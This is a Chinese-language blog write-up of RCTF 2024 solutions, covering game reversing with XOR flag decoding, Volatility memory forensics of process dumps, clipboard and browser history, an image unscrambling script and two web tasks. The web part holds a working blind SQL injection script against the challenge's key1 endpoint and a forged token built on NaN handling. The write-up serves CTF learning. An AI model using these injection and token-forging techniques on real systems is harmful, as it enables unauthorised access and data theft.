RCTF 2024
本文最后更新于 196 天前,其中的信息可能已经有所发展或是发生改变。

原本都打算放弃第一场分站赛,第一天就出了三个解,再加上上海赛,人力精力严重不够
最后9小时密码上大分,硬是进了前二十,师傅们辛苦
累,hvv + rctf + 上海 + sb ppt大赛答辩,天天通宵,快死了

Misc

Logo: Signin

logo="""
####################################################################################################
############################ # #####################################################################
####   ##       ########### ## ##          ###########                   ########             ######
####   ##           #########               ##########                   ######                  ###
####   ########       ########     ##########################    #############    ############    ##
####   ###########     ######    ###########   ##############    ############    ###################
###    #############    #####    ###########    #############    ############    ###################
###    ##############   ####    #############   #############   #############    ###################
###    ##############    ###    #############    ############   ##############     #################
###    ##############    ###   ###############   ############   ###############      ###############
###    ##############   ####   ###############   ############   #################      #############
###    #############    ####   ###############   ###########    ####################      ##########
###    ############    #####   ###############   ###########    ######################     #########
###    ####           ######   ##############    ###########    ########################     #######
###    ####         ########    #############    ###########    ##########################    ######
###    #########    #########   #############   ############    ##########################    ######
###    ##########    ########    ###########   #############    ##########################    ######
###    ###########    ########    #########    #############    #############    #########    ######
###    ############   #########     ######   ############       ###############     ####     #######
###   ############## ###########         ############                  #########           #########
#### ###############################  ##############################################    ############
####################################################################################################
""".strip()

Logo: 2024

企图挖出一个新的CVE,尝试过压缩算法,但是不了了之(评价为逃逸做多了,脑子不正常了

  • 已经很多队伍发wp了,不偷了,这题也没什么通用性

s1ayth3sp1re

  • 配合ce修改器打通关
  • 或者jadx逆向,直接搜3000
if (this.j > 3000) {
    int[] iArr = {164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85};
    int[] iArr2 = {246, 221, 11, 45, WindowsKeycodes.VK_F16, 148, 45, 36, 70, 73, 78, 8, 98, Keyboard.KEY_NUMPADEQUALS, 140, 112, 40};
    String str = "";
    for (int i = 0; i < iArr.length; i++) {
        str = str + String.valueOf((char) (iArr[i] ^ iArr2[i]));
    }
    int[] iArr3 = {100, 174, 197, 56};
    int[] iArr4 = {2, LinuxKeycodes.XK_Acircumflex, 164, 95};
    String str2 = "";
    for (int i2 = 0; i2 < iArr3.length; i2++) {
        str2 = str2 + String.valueOf((char) (iArr3[i2] ^ iArr4[i2]));
    }
    this.d.add(new GameOverStat(str2, null, str));
}
from pwn import xor
a = [164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85]
b = [246, 221, 11, 45, 127, 148, 45, 36, 70, 73, 78, 8, 98, 141, 140, 112, 40]
print(xor(a, b))

FindAHacker

  • pslist之后注意到有个ida的进程
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8018d94840 System                    4      0     70      356 ------      0 2024-05-19 06:58:31 UTC+0000                                 
0xfffffa8019355950 smss.exe                200      4      2       30 ------      0 2024-05-19 06:58:31 UTC+0000                                 
0xfffffa8019de0b30 csrss.exe               288    280      9      425      0      0 2024-05-19 06:58:32 UTC+0000                                 
0xfffffa801a00d060 csrss.exe               380    372     10      185      1      0 2024-05-19 06:58:33 UTC+0000                                 
0xfffffa801a00a420 wininit.exe             388    280      4       80      0      0 2024-05-19 06:58:33 UTC+0000                                 
0xfffffa801a082750 services.exe            440    388     12      209      0      0 2024-05-19 06:58:33 UTC+0000                                 
0xfffffa801a0bc4d0 winlogon.exe            464    372      4      111      1      0 2024-05-19 06:58:34 UTC+0000                                 
0xfffffa801a0c6400 lsass.exe               492    388     10      560      0      0 2024-05-19 06:58:34 UTC+0000                                 
0xfffffa801a0c8060 lsm.exe                 500    388     11      143      0      0 2024-05-19 06:58:34 UTC+0000                                 
0xfffffa801a1535f0 svchost.exe             620    440     15      367      0      0 2024-05-19 06:58:35 UTC+0000                                 
0xfffffa801a16db30 vmacthlp.exe            684    440      4       56      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a17e060 svchost.exe             728    440      9      248      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a1a25e0 svchost.exe             792    440     17      309      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa8018e60250 svchost.exe             864    440     31      650      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a1ecb30 svchost.exe             916    440     14      485      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a207450 svchost.exe             964    440     12      216      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a217b30 svchost.exe            1004    440     19      340      0      0 2024-05-19 06:58:36 UTC+0000                                 
0xfffffa801a25d4a0 svchost.exe             328    440      6      104      0      0 2024-05-19 06:58:37 UTC+0000                                 
0xfffffa801a2d8060 VGAuthService.          240    440      3       91      0      0 2024-05-19 06:58:38 UTC+0000                                 
0xfffffa801a2f8600 vmtoolsd.exe            276    440      9      272      0      0 2024-05-19 06:58:39 UTC+0000                                 
0xfffffa801a302b30 ManagementAgen         1048    440     11       91      0      0 2024-05-19 06:58:39 UTC+0000                                 
0xfffffa801a3b3870 svchost.exe            1228    440      7      100      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a3d25f0 dllhost.exe            1332    440     21      210      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a3ee060 WmiPrvSE.exe           1428    620     11      188      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a400b30 dllhost.exe            1492    440     17      210      0      0 2024-05-19 06:58:40 UTC+0000                                 
0xfffffa801a41bb30 taskhost.exe           1576    440     10      175      1      0 2024-05-19 06:58:41 UTC+0000                                 
0xfffffa801a47e4f0 sppsvc.exe             1788    440      5      152      0      0 2024-05-19 06:58:43 UTC+0000                                 
0xfffffa801a4ae390 msdtc.exe              1848    440     16      156      0      0 2024-05-19 06:58:44 UTC+0000                                 
0xfffffa801a4e3060 dwm.exe                1400    964      7      118      1      0 2024-05-19 06:58:51 UTC+0000                                 
0xfffffa801a4e0060 explorer.exe           1480   1292     28      601      1      0 2024-05-19 06:58:51 UTC+0000                                 
0xfffffa801a53fb30 vmtoolsd.exe           1468   1480      7      191      1      0 2024-05-19 06:58:56 UTC+0000                                 
0xfffffa801a544060 Poner.exe              1420   1480      9      214      1      1 2024-05-19 06:58:56 UTC+0000                                 
0xfffffa801a5d09e0 WmiPrvSE.exe           1756    620     12      255      0      0 2024-05-19 06:59:00 UTC+0000                                 
0xfffffa801a604b30 WmiApSrv.exe           1932    440      7      112      0      0 2024-05-19 06:59:01 UTC+0000                                 
0xfffffa801a6eeb30 idaq64.exe             2172   2156      7      275      1      1 2024-05-19 06:59:21 UTC+0000                                 

解法一

  • dump出进程,导入gimp得到一张ida的图片
$ volatility -f Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile=Win7SP1x64 memdump -p 2172 -D ./
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing idaq64.exe [  2172] to 2172.dmp
  • 可以得到两段数据
353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766
0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100
  • 异或解一下
Python 3.10.10 (tags/v3.10.10:aad5f6a, Feb  7 2023, 17:20:36) [MSC v.1929 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> a = "353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766"
>>> b = "0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100"
>>> from pwn import xor
>>> xor(bytes.fromhex(a), bytes.fromhex(b))
b'90ec9629946830c32157ac9b1ff8656f'

解法二

  • filescan后发现有个enc.i64,使用volatility3导出
$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem filescan.FileScan | grep i64
0x7e578330 100.0\Users\Administrator\Desktop\enc.i64 216

$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem dumpfiles.DumpFiles --physaddr 0x7e578330 
Volatility 3 Framework 2.5.0
Progress:  100.00               PDB scanning finished                        
Cache   FileObject      FileName        Result

DataSectionObject       0x7e578330      enc.i64 file.0x7e578330.0xfa801a460940.DataSectionObject.enc.i64.dat
  • ida启动

gogogo

  • 很明显与火狐相关,导出所有.sqlite文件,在places.sqlite中看到个百度网盘
$ vol.py -f gogogo.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000007f634f80 -D ./ 
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x7f634f80   None   \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.de
SharedCacheMap 0x7f634f80   None   \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.defau
https://pan.baidu.com/share/init?surl=ZllFd8IK-oHvTCYl61_7Kw
  • 在粘贴板找到密码(忘记找到过了,然后就硬卡在这儿
$ vol.py -f gogogo.raw --profile=Win7SP1x86_23418 clipboard                            
Volatility Foundation Volatility Framework 2.6.1
Session    WindowStation Format                 Handle Object     Data                                              
---------- ------------- ------------------ ---------- ---------- --------------------------------------------------
         1 WinSta0       CF_UNICODETEXT       0x2c01b1 0xfcf3c570 cwqs                                              
         1 WinSta0       0x0L                     0x10 ----------                                                   
         1 WinSta0       0x0L                      0x0 ----------                                                   
         1 WinSta0       0x0L                      0x0 ----------                                                   
         1 ------------- ------------------   0x240189 0xfcbf0390
niuo ybufmefhui kjqillxdjwmi uizebuuidvooudpn uibuui jqybdm vegeyisivemeuoll jxysgowodmnkderf dbmzfa hkhkdazizvjnybufme hkwjdeggmana mimajqueviigkyllda doqisl bapnynqrpnqrxcxxzimu
  • strings后发现b站用户(我什么时候才能学会strings大法
https://space.bilibili.com/3546644702301067
  • 双拼输入法得到密码
你说 有什么方式 看起来像加密
是这不是 对哦
双拼 是不是 就有点 这个意思
这么说来 借用过我电脑的人 都没法 好好打字
最近有什么 好玩的跟妈 那 密码就设置成
快来打 夺旗赛 吧
拼音全拼 全小写字母

Sec-image

from PIL import Image

for flag in range(10):
    filename = 'flag{}.png'.format(flag)
    img = Image.open(filename)
    size = img.size
    weight = int(size[0] // 40)
    height = int(size[1] // 40)

    ress = []
    for i in range(4):
        res = Image.new('RGB',(400,400))
        ress.append(res)

    for j in range(40):
        for i in range(40):
            box = (weight * i, height * j, weight * (i + 1), height * (j + 1))
            region = img.crop(box)
            for n in range(4*100):
                pos = n // 4
                x = pos % 10
                y = pos // 10
                pos2 = n % 4
                ii = pos2 % 2
                jj = pos2 // 2
                tmp = region.getpixel((x*2+ii,y*2+jj))
                ress[pos2].putpixel((i*10+x,j*10+y),tmp)

    for i in range(4):
        ress[i].save('./{}.png'.format(flag*4+i))

Web

what_is_love

  • key1盲注
from requests import post
from string import printable

url = "http://ip:port/key1"

printable = bytes(sorted(list(printable.encode()))).decode().replace(")", "").replace("(", "")
payload = "'||love_key>='RCTF{"
while True:
    for i in range(len(printable)):
        test = payload + printable[i]
        data = {"key1": test}
        resp = post(url, data=data)
        if resp.text == "wrong":
            payload += printable[i - 1]
            break
    print(payload)
  • key2用NaN + Number改userinfo
createToken({username: "",love_time: NaN,have_lovers: true,})
// eyJ1c2VybmFtZSI6IiIsImxvdmVfdGltZSI6bnVsbCwiaGF2ZV9sb3ZlcnMiOnRydWV9.6711263ca1c25b2bcc973a4d2c989adfacab694ef5406650c1cf58a178b42fbe
from requests import post

url = "http://ip:port/check"

data = {"love_token": "eyJ1c2VybmFtZSI6IiIsImxvdmVfdGltZSI6bnVsbCwiaGF2ZV9sb3ZlcnMiOnRydWV9.6711263ca1c25b2bcc973a4d2c989adfacab694ef5406650c1cf58a178b42fbe"}

resp = post(url, data=data)
print(resp.text)
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇